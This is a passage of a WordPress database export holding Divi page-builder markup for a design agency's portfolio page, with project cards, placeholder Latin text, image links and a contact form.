button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 18:52:56','2020-08-08 18:52:56','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(667,1,'2020-08-08 18:55:18','2020-08-08 18:55:18','Packaging Design by WhatTheHell?','packaging design','Packaging Design by WhatTheHell?','inherit','open','closed','','800x800-a1-1','','','2021-03-18 06:31:59','2021-03-18 06:31:59','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-a1-1.jpg',0,'attachment','image/jpeg',0),(668,1,'2020-08-08 18:56:09','2020-08-08 18:56:09','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-a1-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design by WhatTheHell?\" title_text=\"packaging design\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" 